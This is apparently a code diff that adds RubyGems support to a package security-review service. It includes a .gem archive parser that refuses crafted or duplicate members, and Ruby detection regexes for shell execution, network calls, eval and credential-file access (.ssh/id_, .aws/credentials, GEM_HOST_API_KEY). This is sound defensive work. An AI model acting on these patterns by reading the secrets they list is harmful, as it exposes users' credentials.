+    version: string | null;
+  };
+  artifactCount: number;
+  fileCount: number;
+  previousFileCount: number;
+  artifacts: GemArtifactSummary[];
+  diff: DiffEntry[];
+  ruleFindings: Finding[];
+  risk: RiskLevel;
+}
+
+export interface RubyGemsAdapterInput {
+  manifest: RubyGemsReleaseManifest;
+  artifacts: RubyGemsArtifactInput[];
+  previousArtifacts?: RubyGemsArtifactInput[];
+  versions?: RubyGemsVersion[];
+}
+
+export interface RubyGemsAdapterDetails {
+  manifest: RubyGemsReleaseManifest;
+  artifacts: GemArtifactSummary[];
+  preparedArtifacts: RubyGemsPreparedArtifact[];
+}
+
+// A single entry from rubygems.org `GET /api/v1/versions/<gem>.json`.
+export interface RubyGemsVersion {
+  number?: string;
+  platform?: string;
+  prerelease?: boolean;
+  created_at?: string;
+  built_at?: string;
+  sha?: string;
+}
+
+// Mirrors the shared BaselineSelectionSource values so the selection can flow
+// straight into BaselineInfo.source.
+export type RubyGemsBaselineSelectionSource = "latest-published" | "upload-time" | "none";
+
+export interface RubyGemsBaselineSelection {
+  version: string | null;
+  source: RubyGemsBaselineSelectionSource;
+  reason: string;
+}
+
+export interface RubyGemsRemoteArtifact {
+  filename: string;
+  url: string;
+  platform: string;
+  version: string;
+}

--- a/server/lib/adapters/types.ts
+++ b/server/lib/adapters/types.ts
@@ -36,7 +36,7 @@ export interface AcquiredArtifact {
 // Opaque to the pipeline — the adapter is the only thing that interprets it.
 export type StagedDetails = unknown;
 
-export type ReleaseProvenanceArtifactKind = "tarball" | "wheel" | "sdist";
+export type ReleaseProvenanceArtifactKind = "tarball" | "wheel" | "sdist" | "gem";
 
 // One reviewed release artifact bound to the SHA-256 the control plane
 // recomputed from its immutable bytes.
@@ -53,7 +53,7 @@ export interface ReleaseProvenanceArtifact {
 // uniformly across ecosystems in the report "Provenance" section and surfaced in
 // the report export so a maintainer's CI can verify against it.
 export interface ReleaseProvenance {
-  ecosystem: "npm" | "pypi";
+  ecosystem: "npm" | "pypi" | "rubygems";
   mode: "workflow_gate";
   artifacts: ReleaseProvenanceArtifact[];
 }

--- a/server/lib/github-app/config.ts
+++ b/server/lib/github-app/config.ts
@@ -9,7 +9,7 @@ export interface GithubAppEnv {
   BETTER_AUTH_SECRET: string;
 }
 
-export const SUPPORTED_ECOSYSTEMS = ["pypi", "npm"] as const;
+export const SUPPORTED_ECOSYSTEMS = ["pypi", "npm", "rubygems"] as const;
 export type SupportedEcosystem = (typeof SUPPORTED_ECOSYSTEMS)[number];
 
 export const INSTALLATION_STATUSES = ["active", "suspended", "uninstalled"] as const;

--- a/server/lib/report-export.ts
+++ b/server/lib/report-export.ts
@@ -126,14 +126,19 @@ function extractProvenance(stagedPublish: unknown): ReleaseProvenance | null {
   const provenance = stagedPublish.provenance;
   if (!isRecord(provenance)) return null;
   const { ecosystem, mode, artifacts } = provenance;
-  if ((ecosystem !== "npm" && ecosystem !== "pypi") || mode !== "workflow_gate") return null;
+  if (
+    (ecosystem !== "npm" && ecosystem !== "pypi" && ecosystem !== "rubygems") ||
+    mode !== "workflow_gate"
+  ) {
+    return null;
+  }
   if (!Array.isArray(artifacts)) return null;
   const mapped: ReleaseProvenanceArtifact[] = [];
   for (const artifact of artifacts) {
     if (!isRecord(artifact)) return null;
     const { path, kind, sha256 } = artifact;
     if (typeof path !== "string" || typeof sha256 !== "string") return null;
-    if (kind === "tarball" || kind === "wheel" || kind === "sdist") {
+    if (kind === "tarball" || kind === "wheel" || kind === "sdist" || kind === "gem") {
       mapped.push({ path, kind, sha256 });
       continue;
     }

--- a/server/lib/review-diff-annotation.ts
+++ b/server/lib/review-diff-annotation.ts
@@ -63,6 +63,7 @@ function isReleaseScopedFinding(finding: { ruleId?: string | null }): boolean {
   return Boolean(
     finding.ruleId?.startsWith("stage.") ||
     finding.ruleId?.startsWith("pypi.") ||
+    finding.ruleId?.startsWith("rubygems.") ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyUnusualSpec ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.dependencyOptionalAdded ||
     finding.ruleId === DETERMINISTIC_RULE_IDS.diffCredentialFileAdded ||

--- a/server/lib/review-rules/index.ts
+++ b/server/lib/review-rules/index.ts
@@ -23,7 +23,9 @@ export {
   codePatternsFor,
   JS_PATTERN_SET,
   PYTHON_PATTERN_SET,
+  RUBY_PATTERN_SET,
   PYTHON_EXECUTION_CAPABILITY_PATTERNS,
+  RUBY_EXECUTION_CAPABILITY_PATTERNS,
   SECRET_PATTERNS,
 } from "./patterns";
 export { safeJson } from "./helpers";

--- a/server/lib/review-rules/patterns.ts
+++ b/server/lib/review-rules/patterns.ts
@@ -90,6 +90,49 @@ const PYTHON_CREDENTIAL_ACCESS_PATTERNS = [
   /\.netrc/,
 ];
 
+const RUBY_PROCESS_EXECUTION_PATTERNS = [
+  /(?<![\w.])system\s*(?:\(|["'`%])/,
+  /(?<![\w.:])exec\s*(?:\(|["'`%])/,
+  /\bIO\.popen\b/,
+  /\bOpen3\b/,
+  /\bProcess\.spawn\b/,
+  /(?<![\w.])spawn\s*(?:\(|["'`%])/,
+  /\bPTY\.spawn\b/,
+  /%x[([{]/,
+  /`[^`\n]+`/,
+  /\bKernel\.(?:system|exec|spawn)\b/,
+];
+const RUBY_NETWORK_ACCESS_PATTERNS = [
+  /\bNet::(?:HTTP|FTP|SMTP|Telnet)\b/,
+  /\brequire\s+["'](?:net\/http|open-uri|socket)["']/,
+  /\bopen-uri\b/,
+  /\bURI\.(?:open|parse)\b/,
+  /\bTCPSocket\b/,
+  /\bSocket\.(?:tcp|new|open)\b/,
+  /\b(?:HTTParty|Faraday|RestClient|Excon|Typhoeus)\b/,
+  /\bopen\s*\(\s*["']https?:\/\//,
+];
+const RUBY_DYNAMIC_EVALUATION_PATTERNS = [
+  /(?<![\w.])eval\s*\(/,
+  /\b(?:instance|class|module)_eval\b/,
+  /\bMarshal\.load\b/,
+  /\bYAML\.(?:unsafe_load|load)\b/,
+  /\bObject\.const_get\b/,
+  /\bBinding\b#?/,
+  /\bBase64\.(?:decode64|urlsafe_decode64)\s*\(/,
+  /\bKernel\.eval\b/,
+];
+const RUBY_CREDENTIAL_ACCESS_PATTERNS = [
+  /\bENV\s*\[/,
+  /\bENV\.fetch\s*\(/,
+  /\bGEM_HOST_API_KEY\b/,
+  /\bNetrc\b/,
+  /\.aws\/credentials/,
+  /\.ssh\/id_/,
+  /\.netrc/,
+  /\.gem\/credentials/,
+];
+
 export const JS_PATTERN_SET = {
   processExecution: JS_PROCESS_EXECUTION_PATTERNS,
   networkAccess: JS_NETWORK_ACCESS_PATTERNS,
@@ -102,6 +145,12 @@ export const PYTHON_PATTERN_SET = {
   dynamicEvaluation: PYTHON_DYNAMIC_EVALUATION_PATTERNS,
   credentialAccess: PYTHON_CREDENTIAL_ACCESS_PATTERNS,
 };
+export const RUBY_PATTERN_SET = {
+  processExecution: RUBY_PROCESS_EXECUTION_PATTERNS,
+  networkAccess: RUBY_NETWORK_ACCESS_PATTERNS,
+  dynamicEvaluation: RUBY_DYNAMIC_EVALUATION_PATTERNS,
+  credentialAccess: RUBY_CREDENTIAL_ACCESS_PATTERNS,
+};
 
 // Python process-execution, network, and dynamic-evaluation capability in one set.
 // Reused by ecosystem adapters that need to know whether a file executes code
@@ -110,6 +159,16 @@ export const PYTHON_EXECUTION_CAPABILITY_PATTERNS = [
   ...PYTHON_PROCESS_EXECUTION_PATTERNS,
   ...PYTHON_NETWORK_ACCESS_PATTERNS,
   ...PYTHON_DYNAMIC_EVALUATION_PATTERNS,
+];
+
+// Ruby process-execution, network, and dynamic-evaluation capability in one set.
+// Reused by the rubygems adapter to decide whether a native-extension build file
+// (extconf.rb, Rakefile, mkrf_conf.rb, …) does more than a normal mkmf build —
+// `gem install` runs those scripts, so code there executes on the consumer.
+export const RUBY_EXECUTION_CAPABILITY_PATTERNS = [
+  ...RUBY_PROCESS_EXECUTION_PATTERNS,
+  ...RUBY_NETWORK_ACCESS_PATTERNS,
+  ...RUBY_DYNAMIC_EVALUATION_PATTERNS,
 ];
 
 export const SECRET_PATTERNS: Array<[RegExp, string]> = [
@@ -149,5 +208,7 @@ function genericSecretPatterns(): Array<[RegExp, string]> {
 }
 
 export function codePatternsFor(codePatternSet: CodePatternSet | undefined): typeof JS_PATTERN_SET {
-  return codePatternSet === "python" ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
+  if (codePatternSet === "python") return PYTHON_PATTERN_SET;
+  if (codePatternSet === "ruby") return RUBY_PATTERN_SET;
+  return JS_PATTERN_SET;
 }

--- a/server/lib/review-rules/scripts.ts
+++ b/server/lib/review-rules/scripts.ts
@@ -105,9 +105,12 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
     // Constant-fold runtime-assembled identifiers (`'chi'+'ld_process'`,
     // `globalThis['re'+'quire']`) so the literal regex set sees them. Matching
     // both raw and normalized text means folding can only add detections, never
-    // drop one a literal scan already finds. JavaScript only for now; the
-    // normalizer is JS-flavored and Python evasion is out of scope.
-    const normalized = ctx.codePatternSet === "python" ? sample : normalizeCodeForScanning(sample);
+    // drop one a literal scan already finds. JavaScript only; the normalizer is
+    // JS-flavored, so Python/Ruby scans use the raw sample.
+    const normalized =
+      ctx.codePatternSet === undefined || ctx.codePatternSet === "javascript"
+        ? normalizeCodeForScanning(sample)
+        : sample;
     const prefix = changedPrefix(ctx, file.path);
     const changed = ctx.diffByPath.get(file.path)?.status;
     const lifecycleScriptFile = isLifecycleScriptFile(ctx, file.path);

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -40,7 +40,7 @@ export interface FindingDiffAnnotation {
   releaseDelta: boolean;
 }
 
-export type CodePatternSet = "javascript" | "python";
+export type CodePatternSet = "javascript" | "python" | "ruby";
 
 export interface FindingAnnotationOptions {
   previousFiles?: Array<Pick<FileRecord, "path" | "textSample" | "flags">>;
@@ -59,6 +59,7 @@ export {
   deterministicFindings,
   packageJsonDiffFindings,
   PYTHON_EXECUTION_CAPABILITY_PATTERNS,
+  RUBY_EXECUTION_CAPABILITY_PATTERNS,
 } from "./review-rules";
 export {
   annotateFindingsWithDiffStatus,

--- a/server/lib/sandbox.ts
+++ b/server/lib/sandbox.ts
@@ -39,6 +39,8 @@ const SANDBOX_TAR_PARSER_EXPORTS = [
   tarParser.readStreamBounded,
   tarParser.parsePackageJson,
   tarParser.gunzipBounded,
+  tarParser.readTarRawEntries,
+  tarParser.readGem,
 ];
 
 function renderTarParserSource() {
@@ -113,12 +115,14 @@ export interface DownloadResult {
   files: FileRecord[];
   packageJson?: PackageJsonSummary | null;
   suspiciousEntries?: TarSuspiciousEntry[];
+  /** Raw Gem::Specification YAML, present only for `.gem` (rubygems) parses. */
+  gemMetadata?: string | null;
 }
 
 export interface DownloadOptions {
   stageId?: string;
   tarballUrl?: string;
-  archiveFormat?: "tgz" | "zip";
+  archiveFormat?: "tgz" | "zip" | "gem";
   publicArtifactUrls?: string[];
   maxFiles?: number;
   npmToken?: string;
@@ -158,7 +162,7 @@ function isSerializedSandboxDetail(message: string): boolean {
 
 export interface InlineDownloadOptions {
   bytes: Uint8Array;
-  format: "tgz" | "zip";
+  format: "tgz" | "zip" | "gem";
   maxFiles?: number;
 }
 
@@ -297,7 +301,7 @@ export default {
     const archiveFormat = inlineFormat || env.ARCHIVE_FORMAT || "tgz";
     let res;
     if (inlineFormat) {
-      if (archiveFormat !== "zip" && archiveFormat !== "tgz") return json({ error: "invalid inline archive format", status: 400 }, 400);
+      if (archiveFormat !== "zip" && archiveFormat !== "tgz" && archiveFormat !== "gem") return json({ error: "invalid inline archive format", status: 400 }, 400);
       res = new Response(request.body, { status: 200, headers: { "content-type": "application/octet-stream" } });
     } else {
       const { stageId, tarballUrl } = await request.json();
@@ -335,6 +339,32 @@ export default {
         return json({ error: reason, status }, status);
       }
       return json({ files, packageJson: null });
+    }
+
+    if (archiveFormat === "gem") {
+      let gemBytes;
+      try {
+        gemBytes = await readStreamBounded(res.body, maxTarBytes);
+      } catch (err) {
+        const reason = err && err.message === "archive too large" ? "archive too large" : "archive download failed";
+        const status = reason === "archive too large" ? 413 : 400;
+        return json({ error: reason, status }, status);
+      }
+      let parsed;
+      try {
+        parsed = await readGem(gemBytes, env.MAX_FILES || 2_500, maxTarBytes);
+      } catch (err) {
+        const reason = err && err.message === "archive contains too many files"
+          ? "archive contains too many files"
+          : err && err.message === "archive expands beyond safety limit"
+            ? "archive expands beyond safety limit"
+            : err && err.message
+              ? err.message
+              : "gem parse failed";
+        const status = reason === "archive contains too many files" || reason === "archive expands beyond safety limit" ? 413 : 400;
+        return json({ error: reason, status }, status);
+      }
+      return json({ files: parsed.files, packageJson: null, suspiciousEntries: parsed.suspicious, gemMetadata: parsed.gemMetadata });
     }
 
     let tar;

--- a/server/lib/tar-parser.d.ts
+++ b/server/lib/tar-parser.d.ts
@@ -37,6 +37,13 @@ export interface ReadTarResult {
   suspicious: TarSuspiciousEntry[];
 }
 
+export interface ReadGemResult {
+  files: ParsedFile[];
+  suspicious: TarSuspiciousEntry[];
+  /** Raw Gem::Specification YAML from the `.gem`'s `metadata.gz` member. */
+  gemMetadata: string | null;
+}
+
 export function readString(bytes: Uint8Array, start: number, len: number): string;
 export function decodeText(bytes: Uint8Array): string;
 export function isPlainObject(value: unknown): value is Record<string, unknown>;
@@ -50,7 +57,10 @@ export function hasImplicitNodeGypInstall(
   packageJson: { scripts?: unknown; gypfile?: unknown } | null | undefined,
 ): boolean;
 export function isSafePaxPath(value: unknown): boolean;
-export function normalizeTarPath(rawPath: string | null | undefined): string | null;
+export function normalizeTarPath(
+  rawPath: string | null | undefined,
+  stripPackageRoot?: boolean,
+): string | null;
 export function normalizeZipPath(rawPath: string | null | undefined): string | null;
 export function parsePax(body: Uint8Array): Record<string, string>;
 export function describeNonRegularType(type: string): string;
@@ -61,6 +71,7 @@ export function readTar(
   buffer: ArrayBuffer | Uint8Array,
   maxFiles: number,
   maxTarBytes: number,
+  options?: { stripPackageRoot?: boolean },
 ): Promise<ReadTarResult>;
 export function readUint16Le(bytes: Uint8Array, offset: number): number;
 export function readUint32Le(bytes: Uint8Array, offset: number): number;
@@ -80,3 +91,13 @@ export function gunzipBounded(
   body: ReadableStream<Uint8Array> | null,
   maxBytes: number,
 ): Promise<ArrayBuffer>;
+export function readTarRawEntries(
+  buffer: ArrayBuffer | Uint8Array,
+  wantedNames: string[],
+  maxTarBytes: number,
+): Promise<Map<string, Uint8Array>>;
+export function readGem(
+  buffer: ArrayBuffer | Uint8Array,
+  maxFiles: number,
+  maxTarBytes: number,
+): Promise<ReadGemResult>;

--- a/server/lib/tar-parser.js
+++ b/server/lib/tar-parser.js
@@ -99,10 +99,11 @@ export function isSafePaxPath(value) {
   return typeof value === "string" && !value.includes(nul) && !value.includes("\\");
 }
 
-export function normalizeTarPath(rawPath) {
+export function normalizeTarPath(rawPath, stripPackageRoot = true) {
   const nul = String.fromCharCode(0);
   if (!rawPath || rawPath.includes(nul) || rawPath.includes("\\")) return null;
-  let path = rawPath.replace(/^\/+/, "").replace(/^package\//, "");
+  let path = rawPath.replace(/^\/+/, "");
+  if (stripPackageRoot) path = path.replace(/^package\//, "");
   if (!path || path.startsWith("../") || path.includes("/../") || /^[A-Za-z]:/.test(path))
     return null;
   const parts = path.split("/").filter(Boolean);
@@ -224,7 +225,8 @@ export function shouldSkipTextSample(path) {
   return false;
 }
 
-export async function readTar(buffer, maxFiles, maxTarBytes) {
+export async function readTar(buffer, maxFiles, maxTarBytes, options) {
+  const stripPackageRoot = !(options && options.stripPackageRoot === false);
   const nul = String.fromCharCode(0);
   const bytes = buffer instanceof Uint8Array ? buffer : new Uint8Array(buffer);
   const files = [];
@@ -288,8 +290,8 @@ export async function readTar(buffer, maxFiles, maxTarBytes) {
       const rawCandidate =
         (pax && pax.path) || nextLongName || (prefix ? prefix + "/" : "") + rawName;
       const canonicalCandidate = canonicalizePath(rawCandidate);
-      const path = normalizeTarPath(rawCandidate);
-      const canonicalPath = normalizeTarPath(canonicalCandidate);
+      const path = normalizeTarPath(rawCandidate, stripPackageRoot);
+      const canonicalPath = normalizeTarPath(canonicalCandidate, stripPackageRoot);
       if (rawCandidate !== canonicalCandidate) {
         addSuspicious({
           kind: "unicode-confusable",
@@ -324,7 +326,8 @@ export async function readTar(buffer, maxFiles, maxTarBytes) {
       // reserved). npm publish never emits these; a hand-crafted tar can.
       const rawCandidate =
         (pax && pax.path) || nextLongName || (prefix ? prefix + "/" : "") + rawName;
-      const reportedPath = normalizeTarPath(canonicalizePath(rawCandidate)) || rawCandidate || "";
+      const reportedPath =
+        normalizeTarPath(canonicalizePath(rawCandidate), stripPackageRoot) || rawCandidate || "";
       addSuspicious({
         kind: "non-regular",
         path: reportedPath,
@@ -543,4 +546,73 @@ export async function gunzipBounded(body, maxBytes) {
     offset += chunk.byteLength;
   }
   return out.buffer;
+}
+
+// Walk an uncompressed tar and return the raw bytes of the named top-level
+// members. A `.gem` is itself an uncompressed tar whose members are fixed
+// (`metadata.gz`, `data.tar.gz`, `checksums.yaml.gz`, plus optional `.sig`
+// siblings), so unlike `readTar` we must hand back the member bytes verbatim to
+// decompress + re-parse them, and we match the exact member name rather than
+// normalizing it (these are archive control members, not package file paths).
+export async function readTarRawEntries(buffer, wantedNames, maxTarBytes) {
+  const nul = String.fromCharCode(0);
+  const bytes = buffer instanceof Uint8Array ? buffer : new Uint8Array(buffer);
+  const wanted = new Set(wantedNames);
+  const out = new Map();
+  let members = 0;
+  for (let offset = 0; offset + 512 <= bytes.length; ) {
+    const header = bytes.subarray(offset, offset + 512);
+    if (header.every((b) => b === 0)) break;
+    // A `.gem` holds a handful of members; a header count far above that means a
+    // crafted archive trying to exhaust us, not a real gem.
+    if (++members > 64) throw new Error("gem archive has too many members");
+    const rawName = readString(header, 0, 100);
+    const prefix = readString(header, 345, 155);
+    const sizeText = readString(header, 124, 12).trim() || "0";
+    if (!/^[0-7]+$/.test(sizeText)) throw new Error("invalid tar entry size");
+    const size = parseInt(sizeText, 8);
+    if (!Number.isFinite(size) || size < 0 || size > maxTarBytes) {
+      throw new Error("invalid tar entry size");
+    }
+    const type = String.fromCharCode(header[156] || 48);
+    offset += 512;
+    if (offset + size > bytes.length) throw new Error("truncated tar entry");
+    const name = (prefix ? prefix + "/" : "") + rawName;
+    if ((type === "0" || type === nul) && wanted.has(name) && !out.has(name)) {
+      out.set(name, bytes.subarray(offset, offset + size));
+    }
+    offset += Math.ceil(size / 512) * 512;
+  }
+  return out;
+}
+
+// Parse a RubyGems `.gem` archive: an uncompressed tar whose `data.tar.gz`
+// member is the gzipped tar of the installed files and whose `metadata.gz`
+// member is the gzipped Gem::Specification YAML. We reuse the same hardened
+// `readTar` for the inner file tar (so the gem's contents flow through the exact
+// untrusted-archive parser npm/PyPI use) and surface the raw gemspec text for
+// the adapter to read identity + capabilities from. Nested decompression is
+// bounded by the same `maxTarBytes` cap, so a gzip bomb in either member fails
+// closed instead of expanding without limit.
+export async function readGem(buffer, maxFiles, maxTarBytes) {
+  const members = await readTarRawEntries(buffer, ["data.tar.gz", "metadata.gz"], maxTarBytes);
+
+  const dataGz = members.get("data.tar.gz");
+  if (!dataGz) throw new Error("gem missing data archive");
+  const dataTar = await gunzipBounded(new Response(dataGz).body, maxTarBytes);
+  if (dataTar.byteLength > maxTarBytes) throw new Error("archive expands beyond safety limit");
+  const parsed = await readTar(dataTar, maxFiles, maxTarBytes, { stripPackageRoot: false });
+
+  let gemMetadata = null;
+  const metaGz = members.get("metadata.gz");
+  if (metaGz) {
+    const metaBuf = await gunzipBounded(new Response(metaGz).body, maxTarBytes);
+    // The gemspec decides package identity; parsing a truncated prefix could
+    // disagree with RubyGems' full YAML parse if later duplicate keys override
+    // the prefix. Fail closed instead of reviewing a partial identity.
+    if (metaBuf.byteLength > 262144) throw new Error("gem metadata too large");
+    gemMetadata = decodeText(new Uint8Array(metaBuf)) || null;
+  }
+
+  return { files: parsed.files, suspicious: parsed.suspicious, gemMetadata };
 }

--- a/server/lib/tar-parser.js
+++ b/server/lib/tar-parser.js
@@ -600,7 +600,19 @@ export async function readTarRawEntries(buffer, wantedNames, maxTarBytes) {
 // bounded by the same `maxTarBytes` cap, so a gzip bomb in either member fails
 // closed instead of expanding without limit.
 export async function readGem(buffer, maxFiles, maxTarBytes) {
-  const members = await readTarRawEntries(buffer, ["data.tar.gz", "metadata.gz"], maxTarBytes);
+  const members = await readTarRawEntries(
+    buffer,
+    ["data.tar.gz", "metadata.gz", "data.tar", "metadata"],
+    maxTarBytes,
+  );
+
+  // RubyGems' own reader also honours legacy uncompressed `metadata`/`data.tar`
+  // members. `gem build` never emits them, so alongside the gzipped members
+  // they can only be a crafted archive feeding RubyGems an identity or payload
+  // this parse never saw; fail closed rather than review the wrong bytes.
+  if (members.has("metadata") || members.has("data.tar")) {
+    throw new Error("gem archive has unexpected control members");
+  }
 
   const dataGz = members.get("data.tar.gz");
   if (!dataGz) throw new Error("gem missing data archive");

--- a/server/lib/tar-parser.js
+++ b/server/lib/tar-parser.js
@@ -578,7 +578,12 @@ export async function readTarRawEntries(buffer, wantedNames, maxTarBytes) {
     offset += 512;
     if (offset + size > bytes.length) throw new Error("truncated tar entry");
     const name = (prefix ? prefix + "/" : "") + rawName;
-    if ((type === "0" || type === nul) && wanted.has(name) && !out.has(name)) {
+    if ((type === "0" || type === nul) && wanted.has(name)) {
+      // A real gem carries each control member exactly once. A duplicate means
+      // a crafted archive betting that we review one payload while RubyGems'
+      // own sequential reader extracts the other; fail closed instead of
+      // picking either.
+      if (out.has(name)) throw new Error("gem archive has duplicate members");
       out.set(name, bytes.subarray(offset, offset + size));
     }
     offset += Math.ceil(size / 512) * 512;

--- a/server/lib/workflow-gates/registry.ts
+++ b/server/lib/workflow-gates/registry.ts
@@ -1,5 +1,6 @@
 import { npmWorkflowGateAdapter } from "./npm";
 import { pypiWorkflowGateAdapter } from "./pypi";
+import { rubygemsWorkflowGateAdapter } from "./rubygems";
 import type { ArchiveContents, WorkflowGateAdapter } from "./types";
 
 /**
@@ -26,6 +27,7 @@ export class UnsupportedEcosystemError extends Error {
 const WORKFLOW_GATE_ADAPTERS: Record<string, WorkflowGateAdapter> = {
   [pypiWorkflowGateAdapter.ecosystem]: pypiWorkflowGateAdapter,
   [npmWorkflowGateAdapter.ecosystem]: npmWorkflowGateAdapter,
+  [rubygemsWorkflowGateAdapter.ecosystem]: rubygemsWorkflowGateAdapter,
 };
 
 /** Resolve the workflow-gate adapter for a release target's ecosystem. */

--- a/server/lib/workflow-gates/resolve.ts
+++ b/server/lib/workflow-gates/resolve.ts
@@ -27,7 +27,7 @@ export async function resolveBundleArtifacts(
   bundle: ResolvedReleaseBundle,
 ): Promise<ParsedGateArtifact[]> {
   return mapWithConcurrency(bundle.artifacts, GATE_ARTIFACT_PARSE_CONCURRENCY, async (file) => {
-    const format = file.path.toLowerCase().endsWith(".whl") ? "zip" : "tgz";
+    const format = archiveFormatForPath(file.path);
     const parsed = await downloadInSandboxInline(env, ctx, { bytes: file.bytes, format });
     const contents = { files: parsed.files, packageJson: parsed.packageJson ?? null };
 
@@ -63,6 +63,7 @@ export async function resolveBundleArtifacts(
       kind,
       files: parsed.files,
       packageJson: parsed.packageJson ?? null,
+      ...(parsed.gemMetadata ? { gemMetadata: parsed.gemMetadata } : {}),
       ...(parsed.suspiciousEntries ? { suspiciousEntries: parsed.suspiciousEntries } : {}),
     };
   });
@@ -85,4 +86,14 @@ async function mapWithConcurrency<T, U>(
   });
   await Promise.all(workers);
   return items.map((_, index) => results.get(index)!);
+}
+
+// npm tarballs and PyPI sdists are gzipped tars, wheels are zips, and a
+// RubyGems `.gem` is an uncompressed tar wrapping nested gzipped members — each
+// needs its own sandbox parse path.
+function archiveFormatForPath(path: string): "tgz" | "zip" | "gem" {
+  const lower = path.toLowerCase();
+  if (lower.endsWith(".whl")) return "zip";
+  if (lower.endsWith(".gem")) return "gem";
+  return "tgz";
 }

--- a/server/lib/workflow-gates/rubygems.ts
+++ b/server/lib/workflow-gates/rubygems.ts
@@ -1,0 +1,157 @@
+import {
+  normalizeGemName,
+  parseRubyGemsReleaseManifest,
+  prepareRubyGemsArtifact,
+  RUBYGEMS_RELEASE_MANIFEST_SCHEMA,
+  rubygemsAdapter,
+  type RubyGemsArtifactInput,
+  type RubyGemsPreparedArtifact,
+  type RubyGemsReleaseManifest,
+} from "../adapters/rubygems/index";
+import type { AdapterBroker, PackageAdapter } from "../adapters/types";
+import { WorkflowArtifactError } from "../github-app/artifacts";
+import type {
+  ArchiveContents,
+  ParsedGateArtifact,
+  PreparedReleaseCandidate,
+  WorkflowArtifactKind,
+  WorkflowGateAdapter,
+} from "./types";
+
+/**
+ * RubyGems workflow-gate adapter.
+ *
+ * Unlike the npm/PyPI archives, a `.gem` extension is unique to RubyGems, so
+ * classification is purely by path and `detectArtifact` never needs to claim an
+ * ambiguous archive. Identity (`package`/`version`/`platform`) is derived from
+ * each gem's `metadata.gz` Gem::Specification, which the shared sandbox surfaces
+ * as `gemMetadata` after parsing the nested `.gem` container. The deterministic
+ * review + baseline selection live in the shared `rubygemsAdapter`
+ * (`server/lib/adapters/rubygems`); this adapter owns only the gate-time
+ * artifact semantics.
+ */
+export const rubygemsWorkflowGateAdapter: WorkflowGateAdapter = {
+  ecosystem: "rubygems",
+  artifactName: "rubygems-release-candidate",
+  packageAdapter: rubygemsAdapter as PackageAdapter<unknown, AdapterBroker>,
+
+  classifyArtifact(path: string): WorkflowArtifactKind | null {
+    return path.toLowerCase().endsWith(".gem") ? "gem" : null;
+  },
+
+  detectArtifact(_contents: ArchiveContents): WorkflowArtifactKind | null {
+    // `.gem` is path-unique; content detection is only used to disambiguate an
+    // extension claimed by more than one ecosystem, which never happens here.
+    return null;
+  },
+
+  prepareReleaseCandidates(artifacts: ParsedGateArtifact[]): PreparedReleaseCandidate[] {
+    const entries: PreparedGemEntry[] = artifacts.map((artifact) => {
+      const input: RubyGemsArtifactInput = {
+        path: artifact.path,
+        files: artifact.files,
+        gemMetadata: artifact.gemMetadata ?? null,
+        ...(artifact.suspiciousEntries ? { suspiciousEntries: artifact.suspiciousEntries } : {}),
+      };
+      return { artifact, input, prepared: prepareRubyGemsArtifact(input) };
+    });
+    return deriveReleaseCandidates(entries);
+  },
+};
+
+interface PreparedGemEntry {
+  artifact: ParsedGateArtifact;
+  input: RubyGemsArtifactInput;
+  prepared: RubyGemsPreparedArtifact;
+}
+
+/**
+ * Split the bundle's `.gem` artifacts into one candidate per distinct gem.
+ *
+ * A monorepo (or a native gem) publishes several `.gem` files from one release;
+ * they are grouped by normalized gem name and each group becomes its own
+ * candidate → its own scan against its own baseline. Identity comes from each
+ * gem's Gem::Specification; every gem must expose a `name`/`version`, gems that
+ * share a name must agree on the version, and two gems claiming the same name +
+ * platform are rejected (a single name/version/platform is exactly one `.gem`),
+ * so a metadata-less, version-skewed, or duplicated file is rejected rather than
+ * silently shipped. Distinct platforms of the same gem are the expected
+ * native-gem shape, not a conflict.
+ */
+function deriveReleaseCandidates(entries: PreparedGemEntry[]): PreparedReleaseCandidate[] {
+  const groups = new Map<
+    string,
+    { name: string; version: string; platforms: Set<string>; entries: PreparedGemEntry[] }
+  >();
+  for (const entry of entries) {
+    const { summary } = entry.prepared;
+    if (!summary.name || !summary.version) {
+      throw new WorkflowArtifactError(
+        "artifact_identity_missing",
+        `${entry.artifact.path} does not expose a gem name/version in its metadata`,
+      );
+    }
+    const normalized = normalizeGemName(summary.name);
+    const group = groups.get(normalized);
+    if (!group) {
+      groups.set(normalized, {
+        name: summary.name,
+        version: summary.version,
+        platforms: new Set([summary.platform]),
+        entries: [entry],
+      });
+      continue;
+    }
+    if (summary.version !== group.version) {
+      throw new WorkflowArtifactError(
+        "artifact_identity_inconsistent",
+        `${entry.artifact.path} version ${summary.version} disagrees with ${group.version} for ${group.name}`,
+      );
+    }
+    if (group.platforms.has(summary.platform)) {
+      throw new WorkflowArtifactError(
+        "artifact_identity_inconsistent",
+        `${entry.artifact.path} duplicates platform ${summary.platform} for ${group.name} ${group.version}`,
+      );
+    }
+    group.platforms.add(summary.platform);
+    group.entries.push(entry);
+  }
+
+  // `entries` is non-empty: the resolver throws `bundle_empty` when a bundle has
+  // no `.gem` files, so `groups` always has at least one gem here.
+  return [...groups.values()].map((group) => {
+    const manifest = buildReleaseManifest(
+      group.name,
+      group.version,
+      group.entries.map((entry) => entry.artifact),
+    );
+    return {
+      ecosystem: "rubygems",
+      pipelineInput: { manifest, artifacts: group.entries.map((entry) => entry.input) },
+      package: { name: manifest.package, version: manifest.version },
+    };
+  });
+}
+
+function buildReleaseManifest(
+  name: string,
+  version: string,
+  files: ParsedGateArtifact[],
+): RubyGemsReleaseManifest {
+  const candidate = {
+    schema: RUBYGEMS_RELEASE_MANIFEST_SCHEMA,
+    ecosystem: "rubygems",
+    package: name,
+    version,
+    artifacts: files.map((file) => ({ path: file.path, sha256: file.sha256 })),
+  };
+  try {
+    return parseRubyGemsReleaseManifest(candidate);
+  } catch (err) {
+    throw new WorkflowArtifactError(
+      "artifact_identity_missing",
+      err instanceof Error ? err.message : "derived release identity is not valid",
+    );
+  }
+}

--- a/server/lib/workflow-gates/types.ts
+++ b/server/lib/workflow-gates/types.ts
@@ -26,8 +26,10 @@ export interface ParsedGateArtifact {
   ecosystem: string;
   kind: WorkflowArtifactKind;
   files: FileRecord[];
-  /** npm tarballs surface their `package.json`; PyPI artifacts are `null`. */
+  /** npm tarballs surface their `package.json`; PyPI/rubygems artifacts are `null`. */
   packageJson: PackageJsonSummary | null;
+  /** `.gem` artifacts surface the raw Gem::Specification YAML; others are absent. */
